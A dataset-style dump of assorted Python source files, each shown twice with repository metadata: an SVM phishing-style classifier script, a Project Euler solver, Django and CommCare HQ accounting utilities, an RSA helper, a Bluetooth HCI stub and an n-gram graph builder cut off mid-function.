model/model.py | CaoHoangTung/shark-cop-server | 2 | 10327 | <reponame>CaoHoangTung/shark-cop-server
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
from sklearn.metrics import classification_report, confusion_matrix
from mlxtend.plotting import plot_decision_regions
# from sklearn import datasets
from pandas.plotting import scatter_matrix
from joblib import dump, load
import collections
kaggle_data = pd.read_csv('data/kaggle.csv')
data = pd.read_csv('data/new_data.csv')
kaggle_X = kaggle_data.iloc[:, :30].values
X = data.drop(['index'],axis=1).iloc[:, :30].values
y = data.iloc[:,-1].values
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.99)
kaggle_X_train, kaggle_X_test, kaggle_y_train, kaggle_y_test = train_test_split(X, y, test_size = 0.02)
svclassifier = SVC(kernel='poly',degree=5)
svclassifier.fit(kaggle_X_train, kaggle_y_train)
dump(svclassifier, 'pre_model.joblib')
y_pred = svclassifier.predict(X_test)
print(confusion_matrix(y_test,y_pred))
print(classification_report(y_test,y_pred))
# print("X=%s, Predicted=%s" % (test_2d, y_pred_test[0]))
# print(y_pred.shape)
# TESTING ZONE
X = [[-1,1,0,-1,-1,-1,1,0,-1,1,1,-1,0,0,-1,-1,-1,-1,0,1,0,0,0,-1,1,1,1,1,-1,-1]]
print("PREDICTION:",svclassifier.predict(X))
| import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
from sklearn.metrics import classification_report, confusion_matrix
from mlxtend.plotting import plot_decision_regions
# from sklearn import datasets
from pandas.plotting import scatter_matrix
from joblib import dump, load
import collections
kaggle_data = pd.read_csv('data/kaggle.csv')
data = pd.read_csv('data/new_data.csv')
kaggle_X = kaggle_data.iloc[:, :30].values
X = data.drop(['index'],axis=1).iloc[:, :30].values
y = data.iloc[:,-1].values
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.99)
kaggle_X_train, kaggle_X_test, kaggle_y_train, kaggle_y_test = train_test_split(X, y, test_size = 0.02)
svclassifier = SVC(kernel='poly',degree=5)
svclassifier.fit(kaggle_X_train, kaggle_y_train)
dump(svclassifier, 'pre_model.joblib')
y_pred = svclassifier.predict(X_test)
print(confusion_matrix(y_test,y_pred))
print(classification_report(y_test,y_pred))
# print("X=%s, Predicted=%s" % (test_2d, y_pred_test[0]))
# print(y_pred.shape)
# TESTING ZONE
X = [[-1,1,0,-1,-1,-1,1,0,-1,1,1,-1,0,0,-1,-1,-1,-1,0,1,0,0,0,-1,1,1,1,1,-1,-1]]
print("PREDICTION:",svclassifier.predict(X)) | en | 0.215857 | # from sklearn import datasets # print("X=%s, Predicted=%s" % (test_2d, y_pred_test[0])) # print(y_pred.shape) # TESTING ZONE | 2.818171 | 3 |
PE032.py | CaptainSora/Python-Project-Euler | 0 | 10328 | from itertools import count
from _pandigital_tools import is_pandigital
def pand_products():
"""
Returns the sum of all numbers n which have a factorization a * b = n such
that a, b, n are (cumulatively) 1 through 9 pandigital.
"""
total = set()
for a in range(2, 100):
for b in count(a):
if len(str(a) + str(b) + str(a * b)) > 9:
break
elif is_pandigital(a, b, a * b):
total.add(a * b)
return sum(total)
def solve(vol=0):
return pand_products()
| from itertools import count
from _pandigital_tools import is_pandigital
def pand_products():
"""
Returns the sum of all numbers n which have a factorization a * b = n such
that a, b, n are (cumulatively) 1 through 9 pandigital.
"""
total = set()
for a in range(2, 100):
for b in count(a):
if len(str(a) + str(b) + str(a * b)) > 9:
break
elif is_pandigital(a, b, a * b):
total.add(a * b)
return sum(total)
def solve(vol=0):
return pand_products()
| en | 0.940235 | Returns the sum of all numbers n which have a factorization a * b = n such that a, b, n are (cumulatively) 1 through 9 pandigital. | 3.675899 | 4 |
v1/models.py | jdubansky/openstates.org | 1 | 10329 | from django.db import models
from openstates.data.models import Bill
class LegacyBillMapping(models.Model):
legacy_id = models.CharField(max_length=20, primary_key=True)
bill = models.ForeignKey(
Bill, related_name="legacy_mapping", on_delete=models.CASCADE
)
| from django.db import models
from openstates.data.models import Bill
class LegacyBillMapping(models.Model):
legacy_id = models.CharField(max_length=20, primary_key=True)
bill = models.ForeignKey(
Bill, related_name="legacy_mapping", on_delete=models.CASCADE
)
| none | 1 | 2.05028 | 2 |
|
corehq/apps/accounting/utils.py | satyaakam/commcare-hq | 0 | 10330 | <filename>corehq/apps/accounting/utils.py
import datetime
import logging
from collections import defaultdict, namedtuple
from django.conf import settings
from django.template.loader import render_to_string
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
from django_prbac.models import Grant, Role, UserRole
from corehq.const import USER_DATE_FORMAT
from dimagi.utils.couch.database import iter_docs
from dimagi.utils.dates import add_months
from corehq import privileges
from corehq.apps.accounting.exceptions import (
AccountingError,
ProductPlanNotFoundError,
)
from corehq.apps.domain.models import Domain
from corehq.util.quickcache import quickcache
from corehq.util.view_utils import absolute_reverse
logger = logging.getLogger('accounting')
EXCHANGE_RATE_DECIMAL_PLACES = 9
def log_accounting_error(message, show_stack_trace=False):
logger.error("[BILLING] %s" % message, exc_info=show_stack_trace)
def log_accounting_info(message):
logger.info("[BILLING] %s" % message)
def months_from_date(reference_date, months_from_date):
year, month = add_months(reference_date.year, reference_date.month, months_from_date)
return datetime.date(year, month, 1)
def ensure_domain_instance(domain):
if not isinstance(domain, Domain):
domain = Domain.get_by_name(domain)
return domain
def fmt_feature_rate_dict(feature, feature_rate=None):
"""
This will be turned into a JSON representation of this Feature and its FeatureRate
"""
if feature_rate is None:
feature_rate = feature.get_rate()
return {
'name': feature.name,
'feature_type': feature.feature_type,
'feature_id': feature.id,
'rate_id': feature_rate.id,
'monthly_fee': str(feature_rate.monthly_fee),
'monthly_limit': feature_rate.monthly_limit,
'per_excess_fee': str(feature_rate.per_excess_fee),
}
def fmt_product_rate_dict(product_name, product_rate=None):
"""
This will be turned into a JSON representation of this SoftwareProductRate
"""
from corehq.apps.accounting.models import SoftwareProductRate
if product_rate is None:
try:
product_rate = SoftwareProductRate.objects.filter(
is_active=True,
name=product_name,
).latest('date_created')
except SoftwareProductRate.DoesNotExist:
product_rate = SoftwareProductRate.objects.create(name=product_name, is_active=True)
return {
'name': product_rate.name,
'rate_id': product_rate.id,
'monthly_fee': str(product_rate.monthly_fee),
}
def get_privileges(plan_version):
role = plan_version.role.get_cached_role()
return set([grant.to_role.slug for grant in role.memberships_granted.all()])
ChangeStatusResult = namedtuple('ChangeStatusResult', ['adjustment_reason', 'downgraded_privs', 'upgraded_privs'])
def get_change_status(from_plan_version, to_plan_version):
from_privs = (
get_privileges(from_plan_version)
if from_plan_version is not None
else set(privileges.MAX_PRIVILEGES)
)
to_privs = get_privileges(to_plan_version) if to_plan_version is not None else set()
downgraded_privs = from_privs.difference(to_privs)
upgraded_privs = to_privs
from corehq.apps.accounting.models import SubscriptionAdjustmentReason as Reason
if from_plan_version is None:
adjustment_reason = Reason.CREATE
else:
adjustment_reason = Reason.SWITCH
if len(downgraded_privs) == 0 and len(upgraded_privs) > 0:
adjustment_reason = Reason.UPGRADE
elif len(upgraded_privs) == 0 and len(downgraded_privs) > 0:
adjustment_reason = Reason.DOWNGRADE
return ChangeStatusResult(adjustment_reason, downgraded_privs, upgraded_privs)
def domain_has_privilege_cache_args(domain, privilege_slug, **assignment):
return [
domain.name if isinstance(domain, Domain) else domain,
privilege_slug
]
@quickcache(domain_has_privilege_cache_args, timeout=10)
def domain_has_privilege(domain, privilege_slug, **assignment):
from corehq.apps.accounting.models import Subscription
try:
plan_version = Subscription.get_subscribed_plan_by_domain(domain)
privilege = Role.get_privilege(privilege_slug, assignment)
if privilege is None:
return False
if plan_version.role.has_privilege(privilege):
return True
except ProductPlanNotFoundError:
return False
except AccountingError:
pass
return False
@quickcache(['domain_name'], timeout=15 * 60)
def domain_is_on_trial(domain_name):
from corehq.apps.accounting.models import Subscription
subscription = Subscription.get_active_subscription_by_domain(domain_name)
return subscription and subscription.is_trial
def is_active_subscription(date_start, date_end, today=None):
today = today or datetime.date.today()
return ((date_start is None or date_start <= today)
and (date_end is None or today < date_end))
def has_subscription_already_ended(subscription):
return (subscription.date_end is not None
and subscription.date_end <= datetime.date.today())
def get_money_str(amount):
if amount is not None:
if amount < 0:
fmt = "-$%0.2f"
amount = abs(amount)
else:
fmt = "$%0.2f"
return fmt % amount
return ""
def get_address_from_invoice(invoice):
from corehq.apps.accounting.invoice_pdf import Address
from corehq.apps.accounting.models import BillingContactInfo
try:
contact_info = BillingContactInfo.objects.get(
account=invoice.account,
)
return Address(
name=(
"%s %s" %
(contact_info.first_name
if contact_info.first_name is not None else "",
contact_info.last_name
if contact_info.last_name is not None else "")
),
company_name=contact_info.company_name,
first_line=contact_info.first_line,
second_line=contact_info.second_line,
city=contact_info.city,
region=contact_info.state_province_region,
postal_code=contact_info.postal_code,
country=contact_info.country,
)
except BillingContactInfo.DoesNotExist:
return Address()
def get_dimagi_from_email():
return ("Dimagi CommCare Accounts <%(email)s>" % {
'email': settings.INVOICING_CONTACT_EMAIL,
})
def quantize_accounting_decimal(decimal_value):
return "%0.2f" % decimal_value
def fmt_dollar_amount(decimal_value):
return _("USD %s") % quantize_accounting_decimal(decimal_value)
def get_customer_cards(username, domain):
from corehq.apps.accounting.models import (
StripePaymentMethod, PaymentMethodType,
)
import stripe
try:
payment_method = StripePaymentMethod.objects.get(
web_user=username,
method_type=PaymentMethodType.STRIPE
)
stripe_customer = payment_method.customer
return dict(stripe_customer.cards)
except StripePaymentMethod.DoesNotExist:
pass
except stripe.error.AuthenticationError:
if not settings.STRIPE_PRIVATE_KEY:
log_accounting_info("Private key is not defined in settings")
else:
raise
return None
def is_accounting_admin(user):
accounting_privilege = Role.get_privilege(privileges.ACCOUNTING_ADMIN)
if accounting_privilege is None:
return False
try:
return user.prbac_role.has_privilege(accounting_privilege)
except (AttributeError, UserRole.DoesNotExist):
return False
def make_anchor_tag(href, name, attrs=None):
context = {
'href': href,
'name': name,
'attrs': attrs or {},
}
return render_to_string('accounting/partials/anchor_tag.html', context)
def get_default_domain_url(domain):
from corehq.apps.domain.views.settings import DefaultProjectSettingsView
return absolute_reverse(
DefaultProjectSettingsView.urlname,
args=[domain],
)
def ensure_grants(grants_to_privs, dry_run=False, verbose=False, roles_by_slug=None):
"""
Adds a parameterless grant between grantee and priv, looked up by slug.
:param grants_to_privs: An iterable of two-tuples:
`(grantee_slug, priv_slugs)`. Will only be iterated once.
"""
dry_run_tag = "[DRY RUN] " if dry_run else ""
if roles_by_slug is None:
roles_by_slug = {role.slug: role for role in Role.objects.all()}
granted = defaultdict(set)
for grant in Grant.objects.select_related('from_role', 'to_role').all():
granted[grant.from_role.slug].add(grant.to_role.slug)
grants_to_create = []
for grantee_slug, priv_slugs in grants_to_privs:
if grantee_slug not in roles_by_slug:
logger.info('grantee %s does not exist.', grantee_slug)
continue
for priv_slug in priv_slugs:
if priv_slug not in roles_by_slug:
logger.info('privilege %s does not exist.', priv_slug)
continue
if priv_slug in granted[grantee_slug]:
if verbose or dry_run:
logger.info('%sPrivilege already granted: %s => %s',
dry_run_tag, grantee_slug, priv_slug)
else:
granted[grantee_slug].add(priv_slug)
if verbose or dry_run:
logger.info('%sGranting privilege: %s => %s',
dry_run_tag, grantee_slug, priv_slug)
if not dry_run:
grants_to_create.append(Grant(
from_role=roles_by_slug[grantee_slug],
to_role=roles_by_slug[priv_slug]
))
if grants_to_create:
Role.get_cache().clear()
Grant.objects.bulk_create(grants_to_create)
def log_removed_grants(priv_slugs, dry_run=False):
grants = Grant.objects.filter(to_role__slug__in=list(priv_slugs))
if grants:
logger.info("%sRemoving privileges: %s",
("[DRY RUN] " if dry_run else ""),
", ".join(g.to_role.slug for g in grants),
)
def get_account_name_from_default_name(default_name):
from corehq.apps.accounting.models import BillingAccount
if not BillingAccount.objects.filter(name=default_name).exists():
return default_name
else:
matching_regex_count = BillingAccount.objects.filter(
name__iregex=r'^%s \(\d+\)$' % default_name,
).count()
return '%s (%d)' % (
default_name,
matching_regex_count + 1
)
def cancel_future_subscriptions(domain_name, from_date, web_user):
from corehq.apps.accounting.models import (
Subscription,
SubscriptionAdjustment,
SubscriptionAdjustmentReason,
)
for later_subscription in Subscription.visible_objects.filter(
subscriber__domain=domain_name,
date_start__gt=from_date,
).order_by('date_start').all():
later_subscription.date_end = later_subscription.date_start
later_subscription.save()
SubscriptionAdjustment.record_adjustment(
later_subscription,
reason=SubscriptionAdjustmentReason.CANCEL,
web_user=web_user,
note="Cancelled due to changing subscription",
)
def pause_current_subscription(domain_name, web_user, current_subscription):
from corehq.apps.accounting.models import (
Subscription,
DefaultProductPlan,
SoftwarePlanEdition,
SubscriptionAdjustmentMethod,
SubscriptionType,
ProBonoStatus,
FundingSource,
)
cancel_future_subscriptions(domain_name, datetime.date.today(), web_user)
paused_plan_version = DefaultProductPlan.get_default_plan_version(
SoftwarePlanEdition.PAUSED
)
if current_subscription.is_below_minimum_subscription:
current_subscription.update_subscription(
date_start=current_subscription.date_start,
date_end=current_subscription.date_start + datetime.timedelta(days=30)
)
return Subscription.new_domain_subscription(
account=current_subscription.account,
domain=domain_name,
plan_version=paused_plan_version,
date_start=current_subscription.date_start + datetime.timedelta(days=30),
web_user=web_user,
adjustment_method=SubscriptionAdjustmentMethod.USER,
service_type=SubscriptionType.PRODUCT,
pro_bono_status=ProBonoStatus.NO,
funding_source=FundingSource.CLIENT,
do_not_invoice=True,
no_invoice_reason='Paused plan',
)
else:
return current_subscription.change_plan(
paused_plan_version,
web_user=web_user,
adjustment_method=SubscriptionAdjustmentMethod.USER,
service_type=SubscriptionType.PRODUCT,
pro_bono_status=ProBonoStatus.NO,
do_not_invoice=True,
no_invoice_reason='Paused plan',
)
def is_downgrade(current_edition, next_edition):
from corehq.apps.accounting.models import SoftwarePlanEdition
plans = SoftwarePlanEdition.SELF_SERVICE_ORDER + [SoftwarePlanEdition.ENTERPRISE]
return plans.index(current_edition) > plans.index(next_edition)
def clear_plan_version_cache():
from corehq.apps.accounting.models import SoftwarePlan
for software_plan in SoftwarePlan.objects.all():
SoftwarePlan.get_version.clear(software_plan)
def get_paused_plan_context(request, domain):
from corehq.apps.accounting.models import Subscription
from corehq.apps.domain.views import SelectPlanView
current_sub = Subscription.get_active_subscription_by_domain(domain)
if (not current_sub
or not current_sub.plan_version.is_paused
or not current_sub.previous_subscription):
return {}
previous_edition = (current_sub.previous_subscription.plan_version.plan.edition
if current_sub.previous_subscription else "")
return {
'is_paused': True,
'previous_edition': previous_edition,
'paused_date': current_sub.date_start.strftime(USER_DATE_FORMAT),
'change_plan_url': reverse(SelectPlanView.urlname, args=[domain]),
'can_edit_billing_info': request.couch_user.is_domain_admin(domain),
}
| <filename>corehq/apps/accounting/utils.py
import datetime
import logging
from collections import defaultdict, namedtuple
from django.conf import settings
from django.template.loader import render_to_string
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
from django_prbac.models import Grant, Role, UserRole
from corehq.const import USER_DATE_FORMAT
from dimagi.utils.couch.database import iter_docs
from dimagi.utils.dates import add_months
from corehq import privileges
from corehq.apps.accounting.exceptions import (
AccountingError,
ProductPlanNotFoundError,
)
from corehq.apps.domain.models import Domain
from corehq.util.quickcache import quickcache
from corehq.util.view_utils import absolute_reverse
logger = logging.getLogger('accounting')
EXCHANGE_RATE_DECIMAL_PLACES = 9
def log_accounting_error(message, show_stack_trace=False):
logger.error("[BILLING] %s" % message, exc_info=show_stack_trace)
def log_accounting_info(message):
logger.info("[BILLING] %s" % message)
def months_from_date(reference_date, months_from_date):
year, month = add_months(reference_date.year, reference_date.month, months_from_date)
return datetime.date(year, month, 1)
def ensure_domain_instance(domain):
if not isinstance(domain, Domain):
domain = Domain.get_by_name(domain)
return domain
def fmt_feature_rate_dict(feature, feature_rate=None):
"""
This will be turned into a JSON representation of this Feature and its FeatureRate
"""
if feature_rate is None:
feature_rate = feature.get_rate()
return {
'name': feature.name,
'feature_type': feature.feature_type,
'feature_id': feature.id,
'rate_id': feature_rate.id,
'monthly_fee': str(feature_rate.monthly_fee),
'monthly_limit': feature_rate.monthly_limit,
'per_excess_fee': str(feature_rate.per_excess_fee),
}
def fmt_product_rate_dict(product_name, product_rate=None):
"""
This will be turned into a JSON representation of this SoftwareProductRate
"""
from corehq.apps.accounting.models import SoftwareProductRate
if product_rate is None:
try:
product_rate = SoftwareProductRate.objects.filter(
is_active=True,
name=product_name,
).latest('date_created')
except SoftwareProductRate.DoesNotExist:
product_rate = SoftwareProductRate.objects.create(name=product_name, is_active=True)
return {
'name': product_rate.name,
'rate_id': product_rate.id,
'monthly_fee': str(product_rate.monthly_fee),
}
def get_privileges(plan_version):
role = plan_version.role.get_cached_role()
return set([grant.to_role.slug for grant in role.memberships_granted.all()])
ChangeStatusResult = namedtuple('ChangeStatusResult', ['adjustment_reason', 'downgraded_privs', 'upgraded_privs'])
def get_change_status(from_plan_version, to_plan_version):
from_privs = (
get_privileges(from_plan_version)
if from_plan_version is not None
else set(privileges.MAX_PRIVILEGES)
)
to_privs = get_privileges(to_plan_version) if to_plan_version is not None else set()
downgraded_privs = from_privs.difference(to_privs)
upgraded_privs = to_privs
from corehq.apps.accounting.models import SubscriptionAdjustmentReason as Reason
if from_plan_version is None:
adjustment_reason = Reason.CREATE
else:
adjustment_reason = Reason.SWITCH
if len(downgraded_privs) == 0 and len(upgraded_privs) > 0:
adjustment_reason = Reason.UPGRADE
elif len(upgraded_privs) == 0 and len(downgraded_privs) > 0:
adjustment_reason = Reason.DOWNGRADE
return ChangeStatusResult(adjustment_reason, downgraded_privs, upgraded_privs)
def domain_has_privilege_cache_args(domain, privilege_slug, **assignment):
return [
domain.name if isinstance(domain, Domain) else domain,
privilege_slug
]
@quickcache(domain_has_privilege_cache_args, timeout=10)
def domain_has_privilege(domain, privilege_slug, **assignment):
from corehq.apps.accounting.models import Subscription
try:
plan_version = Subscription.get_subscribed_plan_by_domain(domain)
privilege = Role.get_privilege(privilege_slug, assignment)
if privilege is None:
return False
if plan_version.role.has_privilege(privilege):
return True
except ProductPlanNotFoundError:
return False
except AccountingError:
pass
return False
@quickcache(['domain_name'], timeout=15 * 60)
def domain_is_on_trial(domain_name):
from corehq.apps.accounting.models import Subscription
subscription = Subscription.get_active_subscription_by_domain(domain_name)
return subscription and subscription.is_trial
def is_active_subscription(date_start, date_end, today=None):
today = today or datetime.date.today()
return ((date_start is None or date_start <= today)
and (date_end is None or today < date_end))
def has_subscription_already_ended(subscription):
return (subscription.date_end is not None
and subscription.date_end <= datetime.date.today())
def get_money_str(amount):
if amount is not None:
if amount < 0:
fmt = "-$%0.2f"
amount = abs(amount)
else:
fmt = "$%0.2f"
return fmt % amount
return ""
def get_address_from_invoice(invoice):
from corehq.apps.accounting.invoice_pdf import Address
from corehq.apps.accounting.models import BillingContactInfo
try:
contact_info = BillingContactInfo.objects.get(
account=invoice.account,
)
return Address(
name=(
"%s %s" %
(contact_info.first_name
if contact_info.first_name is not None else "",
contact_info.last_name
if contact_info.last_name is not None else "")
),
company_name=contact_info.company_name,
first_line=contact_info.first_line,
second_line=contact_info.second_line,
city=contact_info.city,
region=contact_info.state_province_region,
postal_code=contact_info.postal_code,
country=contact_info.country,
)
except BillingContactInfo.DoesNotExist:
return Address()
def get_dimagi_from_email():
return ("Dimagi CommCare Accounts <%(email)s>" % {
'email': settings.INVOICING_CONTACT_EMAIL,
})
def quantize_accounting_decimal(decimal_value):
return "%0.2f" % decimal_value
def fmt_dollar_amount(decimal_value):
return _("USD %s") % quantize_accounting_decimal(decimal_value)
def get_customer_cards(username, domain):
from corehq.apps.accounting.models import (
StripePaymentMethod, PaymentMethodType,
)
import stripe
try:
payment_method = StripePaymentMethod.objects.get(
web_user=username,
method_type=PaymentMethodType.STRIPE
)
stripe_customer = payment_method.customer
return dict(stripe_customer.cards)
except StripePaymentMethod.DoesNotExist:
pass
except stripe.error.AuthenticationError:
if not settings.STRIPE_PRIVATE_KEY:
log_accounting_info("Private key is not defined in settings")
else:
raise
return None
def is_accounting_admin(user):
accounting_privilege = Role.get_privilege(privileges.ACCOUNTING_ADMIN)
if accounting_privilege is None:
return False
try:
return user.prbac_role.has_privilege(accounting_privilege)
except (AttributeError, UserRole.DoesNotExist):
return False
def make_anchor_tag(href, name, attrs=None):
context = {
'href': href,
'name': name,
'attrs': attrs or {},
}
return render_to_string('accounting/partials/anchor_tag.html', context)
def get_default_domain_url(domain):
from corehq.apps.domain.views.settings import DefaultProjectSettingsView
return absolute_reverse(
DefaultProjectSettingsView.urlname,
args=[domain],
)
def ensure_grants(grants_to_privs, dry_run=False, verbose=False, roles_by_slug=None):
"""
Adds a parameterless grant between grantee and priv, looked up by slug.
:param grants_to_privs: An iterable of two-tuples:
`(grantee_slug, priv_slugs)`. Will only be iterated once.
"""
dry_run_tag = "[DRY RUN] " if dry_run else ""
if roles_by_slug is None:
roles_by_slug = {role.slug: role for role in Role.objects.all()}
granted = defaultdict(set)
for grant in Grant.objects.select_related('from_role', 'to_role').all():
granted[grant.from_role.slug].add(grant.to_role.slug)
grants_to_create = []
for grantee_slug, priv_slugs in grants_to_privs:
if grantee_slug not in roles_by_slug:
logger.info('grantee %s does not exist.', grantee_slug)
continue
for priv_slug in priv_slugs:
if priv_slug not in roles_by_slug:
logger.info('privilege %s does not exist.', priv_slug)
continue
if priv_slug in granted[grantee_slug]:
if verbose or dry_run:
logger.info('%sPrivilege already granted: %s => %s',
dry_run_tag, grantee_slug, priv_slug)
else:
granted[grantee_slug].add(priv_slug)
if verbose or dry_run:
logger.info('%sGranting privilege: %s => %s',
dry_run_tag, grantee_slug, priv_slug)
if not dry_run:
grants_to_create.append(Grant(
from_role=roles_by_slug[grantee_slug],
to_role=roles_by_slug[priv_slug]
))
if grants_to_create:
Role.get_cache().clear()
Grant.objects.bulk_create(grants_to_create)
def log_removed_grants(priv_slugs, dry_run=False):
grants = Grant.objects.filter(to_role__slug__in=list(priv_slugs))
if grants:
logger.info("%sRemoving privileges: %s",
("[DRY RUN] " if dry_run else ""),
", ".join(g.to_role.slug for g in grants),
)
def get_account_name_from_default_name(default_name):
from corehq.apps.accounting.models import BillingAccount
if not BillingAccount.objects.filter(name=default_name).exists():
return default_name
else:
matching_regex_count = BillingAccount.objects.filter(
name__iregex=r'^%s \(\d+\)$' % default_name,
).count()
return '%s (%d)' % (
default_name,
matching_regex_count + 1
)
def cancel_future_subscriptions(domain_name, from_date, web_user):
from corehq.apps.accounting.models import (
Subscription,
SubscriptionAdjustment,
SubscriptionAdjustmentReason,
)
for later_subscription in Subscription.visible_objects.filter(
subscriber__domain=domain_name,
date_start__gt=from_date,
).order_by('date_start').all():
later_subscription.date_end = later_subscription.date_start
later_subscription.save()
SubscriptionAdjustment.record_adjustment(
later_subscription,
reason=SubscriptionAdjustmentReason.CANCEL,
web_user=web_user,
note="Cancelled due to changing subscription",
)
def pause_current_subscription(domain_name, web_user, current_subscription):
from corehq.apps.accounting.models import (
Subscription,
DefaultProductPlan,
SoftwarePlanEdition,
SubscriptionAdjustmentMethod,
SubscriptionType,
ProBonoStatus,
FundingSource,
)
cancel_future_subscriptions(domain_name, datetime.date.today(), web_user)
paused_plan_version = DefaultProductPlan.get_default_plan_version(
SoftwarePlanEdition.PAUSED
)
if current_subscription.is_below_minimum_subscription:
current_subscription.update_subscription(
date_start=current_subscription.date_start,
date_end=current_subscription.date_start + datetime.timedelta(days=30)
)
return Subscription.new_domain_subscription(
account=current_subscription.account,
domain=domain_name,
plan_version=paused_plan_version,
date_start=current_subscription.date_start + datetime.timedelta(days=30),
web_user=web_user,
adjustment_method=SubscriptionAdjustmentMethod.USER,
service_type=SubscriptionType.PRODUCT,
pro_bono_status=ProBonoStatus.NO,
funding_source=FundingSource.CLIENT,
do_not_invoice=True,
no_invoice_reason='Paused plan',
)
else:
return current_subscription.change_plan(
paused_plan_version,
web_user=web_user,
adjustment_method=SubscriptionAdjustmentMethod.USER,
service_type=SubscriptionType.PRODUCT,
pro_bono_status=ProBonoStatus.NO,
do_not_invoice=True,
no_invoice_reason='Paused plan',
)
def is_downgrade(current_edition, next_edition):
from corehq.apps.accounting.models import SoftwarePlanEdition
plans = SoftwarePlanEdition.SELF_SERVICE_ORDER + [SoftwarePlanEdition.ENTERPRISE]
return plans.index(current_edition) > plans.index(next_edition)
def clear_plan_version_cache():
from corehq.apps.accounting.models import SoftwarePlan
for software_plan in SoftwarePlan.objects.all():
SoftwarePlan.get_version.clear(software_plan)
def get_paused_plan_context(request, domain):
from corehq.apps.accounting.models import Subscription
from corehq.apps.domain.views import SelectPlanView
current_sub = Subscription.get_active_subscription_by_domain(domain)
if (not current_sub
or not current_sub.plan_version.is_paused
or not current_sub.previous_subscription):
return {}
previous_edition = (current_sub.previous_subscription.plan_version.plan.edition
if current_sub.previous_subscription else "")
return {
'is_paused': True,
'previous_edition': previous_edition,
'paused_date': current_sub.date_start.strftime(USER_DATE_FORMAT),
'change_plan_url': reverse(SelectPlanView.urlname, args=[domain]),
'can_edit_billing_info': request.couch_user.is_domain_admin(domain),
}
| en | 0.915255 | This will be turned into a JSON representation of this Feature and its FeatureRate This will be turned into a JSON representation of this SoftwareProductRate Adds a parameterless grant between grantee and priv, looked up by slug. :param grants_to_privs: An iterable of two-tuples: `(grantee_slug, priv_slugs)`. Will only be iterated once. | 1.984207 | 2 |
RSA/Algorithm/EEA.py | Pumpkin-NN/Cryptography | 0 | 10331 | <filename>RSA/Algorithm/EEA.py
def extended_euclidean_algorithm(a, b):
# Initial s = 1
s = 1
list_s = []
list_t = []
# Algorithm
while b > 0:
# Find the remainder of a, b
r = a % b
if r > 0:
# The t expression
t = (r - (a * s)) // b
list_t.append(t)
list_s.append(s)
# Use b to be the new a
a = b
if r > 0:
# Use the remainder to be the new b
b = r
else:
break
# Find the coefficients s and t
for i in range(len(list_t)):
if i+1 < len(list_t):
# Find the coefficient t
t = list_t[0] + (list_t[(len(list_t)-1)] * s)
# Find the coefficient s
s = list_s[i] + list_t[i] * list_t[i+1]
return t
| <filename>RSA/Algorithm/EEA.py
def extended_euclidean_algorithm(a, b):
# Initial s = 1
s = 1
list_s = []
list_t = []
# Algorithm
while b > 0:
# Find the remainder of a, b
r = a % b
if r > 0:
# The t expression
t = (r - (a * s)) // b
list_t.append(t)
list_s.append(s)
# Use b to be the new a
a = b
if r > 0:
# Use the remainder to be the new b
b = r
else:
break
# Find the coefficients s and t
for i in range(len(list_t)):
if i+1 < len(list_t):
# Find the coefficient t
t = list_t[0] + (list_t[(len(list_t)-1)] * s)
# Find the coefficient s
s = list_s[i] + list_t[i] * list_t[i+1]
return t
| en | 0.764078 | # Initial s = 1 # Algorithm # Find the remainder of a, b # The t expression # Use b to be the new a # Use the remainder to be the new b # Find the coefficients s and t # Find the coefficient t # Find the coefficient s | 3.382838 | 3 |
hci/command/commands/le_apcf_commands/apcf_service_data.py | cc4728/python-hci | 3 | 10332 | from ..le_apcf_command_pkt import LE_APCF_Command
from struct import pack, unpack
from enum import IntEnum
"""
This pare base on spec <<Android BT HCI Requirement for BLE feature>> v0.52
Advertisement Package Content filter
"""
class APCF_Service_Data(LE_APCF_Command):
def __init__(self):
# TODO generate cmd
super().__init__()
def __str__(self):
return super().__str__()+''.join(['{}']).format("") | from ..le_apcf_command_pkt import LE_APCF_Command
from struct import pack, unpack
from enum import IntEnum
"""
This pare base on spec <<Android BT HCI Requirement for BLE feature>> v0.52
Advertisement Package Content filter
"""
class APCF_Service_Data(LE_APCF_Command):
def __init__(self):
# TODO generate cmd
super().__init__()
def __str__(self):
return super().__str__()+''.join(['{}']).format("") | en | 0.335834 | This pare base on spec <<Android BT HCI Requirement for BLE feature>> v0.52 Advertisement Package Content filter # TODO generate cmd | 2.215252 | 2 |
source/documentModel/representations/DocumentNGramSymWinGraph.py | Vyvy-vi/Ngram-Graphs | 178 | 10333 | <gh_stars>100-1000
"""
DocumentNGramSymWinGraph.py
Created on May 23, 2017, 4:56 PM
"""
import networkx as nx
import pygraphviz as pgv
import matplotlib.pyplot as plt
from networkx.drawing.nx_agraph import graphviz_layout
from DocumentNGramGraph import DocumentNGramGraph
class DocumentNGramSymWinGraph(DocumentNGramGraph):
# an extension of DocumentNGramGraph
# for symmetric windowing
def buildGraph(self,verbose = False, d=[]):
# set Data @class_variable
self.setData(d)
Data = self._Data
# build ngram
ng = self.build_ngram()
s = len(ng)
# calculate window
win = self._Dwin//2
# initialize graph
self._Graph = nx.Graph()
if(s>=2 and win>=1):
# max possible window size (bounded by win)
o = min(win,s)+1
window = ng[1:o]
i = o
# first build the full window
for gram in ng[0:s-1]:
for w in window:
self.addEdgeInc(gram,w)
window.pop(0)
# if window's edge has reached
# it's the limit of ng stop
# appending
if i<s:
window.append(ng[i][:])
i+=1
# print Graph (optional)
if verbose:
self.GraphDraw(self._GPrintVerbose)
return self._Graph
| """
DocumentNGramSymWinGraph.py
Created on May 23, 2017, 4:56 PM
"""
import networkx as nx
import pygraphviz as pgv
import matplotlib.pyplot as plt
from networkx.drawing.nx_agraph import graphviz_layout
from DocumentNGramGraph import DocumentNGramGraph
class DocumentNGramSymWinGraph(DocumentNGramGraph):
# an extension of DocumentNGramGraph
# for symmetric windowing
def buildGraph(self,verbose = False, d=[]):
# set Data @class_variable
self.setData(d)
Data = self._Data
# build ngram
ng = self.build_ngram()
s = len(ng)
# calculate window
win = self._Dwin//2
# initialize graph
self._Graph = nx.Graph()
if(s>=2 and win>=1):
# max possible window size (bounded by win)
o = min(win,s)+1
window = ng[1:o]
i = o
# first build the full window
for gram in ng[0:s-1]:
for w in window:
self.addEdgeInc(gram,w)
window.pop(0)
# if window's edge has reached
# it's the limit of ng stop
# appending
if i<s:
window.append(ng[i][:])
